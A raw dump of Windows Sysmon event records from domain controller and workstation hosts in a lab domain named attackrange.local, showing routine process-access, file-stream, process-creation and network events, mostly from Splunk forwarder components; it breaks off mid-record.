08:03:59.197{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108316Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.197{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108315Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.197{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108314Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.197{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B56F-615A-8902-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108313Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.197{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B56F-615A-8902-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108312Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.198{58E9C193-B56F-615A-8902-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108311Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.097{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C011DEFFFBAB59DA2509CF683A2FCA8D,SHA256=486E5F8BE154493ADA22515CBCD21DA9581634C3EFAD2CA4F2FFCD13EB0897C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108310Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.097{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FD973D35A81773DAD6855B7F736D088,SHA256=7E0B1B7EDDB7A2255B163FEC6B808AD03D1C84D2325E1F80F5F0F7616FB96876,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108309Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:57.306{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51955-false10.0.1.12-8089- 23542300x800000000000000083838Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:00.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83AC91B1351E32AE18608ED19A86F5A5,SHA256=0553308F87088F63E86880160225AD2BB094823C4C64B84E81C8158E1C9F86F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108334Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.752{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-AC86-615A-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x8000000000000000108333Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8EB8A4F69EAF6FCF94D1C07E394A29B,SHA256=A80B214387F582CF9F4A700B0BE778C1478D57C69393CF0809BE82779A9BA832,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108332Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.243{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B570-615A-8A02-00000000FC01}7380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108331Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.243{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108330Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.243{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108329Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.243{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108328Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.243{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108327Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.243{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B570-615A-8A02-00000000FC01}7380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108326Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.243{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B570-615A-8A02-00000000FC01}7380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108325Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.244{58E9C193-B570-615A-8A02-00000000FC01}7380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108324Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.212{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C011DEFFFBAB59DA2509CF683A2FCA8D,SHA256=486E5F8BE154493ADA22515CBCD21DA9581634C3EFAD2CA4F2FFCD13EB0897C5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108323Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.327{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51956-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000108322Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.327{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51956-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 23542300x800000000000000083839Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:01.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FDA1553384F1FDA841AF32EC3B039F6,SHA256=3703DC25532EF9E4C2E735E47363F2579E805FA98B7C3592DD661277934CEAD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108340Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.614{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8967FC3405D7C1E9EDDBE9310249E184,SHA256=DAB6BF7B951108238038CE366DEF7F278FD448C9BED89098A6D0CB47EC1EF347,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108339Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.252{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13AB57EA4C8FC1782EBA7B6BCC60F63B,SHA256=0A17386D5E89909488E46AD5B00BB45ACE064CDD5928EC4B6581F99F56D46924,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108338Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.358{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51957-false10.0.1.12-8000- 10341000x8000000000000000108337Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.999{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108336Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.999{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108335Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.999{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108356Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:02.633{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A47EF00889BBDE49F6ADE89211306306,SHA256=80A609A631B9CC4CC9DE7E2C587A66B7DF4B03E76375D00B4EA728A48C461829,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083841Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:59.670{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50195-false10.0.1.12-8000- 23542300x800000000000000083840Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:02.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A102A174932DE00B0FE32595FFECBCD,SHA256=F71F873F012085551EEC4D4D444D0ACA7EF7BCB9033147ECCC5FC78DFC241662,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108355Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:02.242{58E9C193-B571-615A-8B02-00000000FC01}84808484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000108354Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.003{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51960-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000108353Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.003{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51960-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000108352Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.887{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT 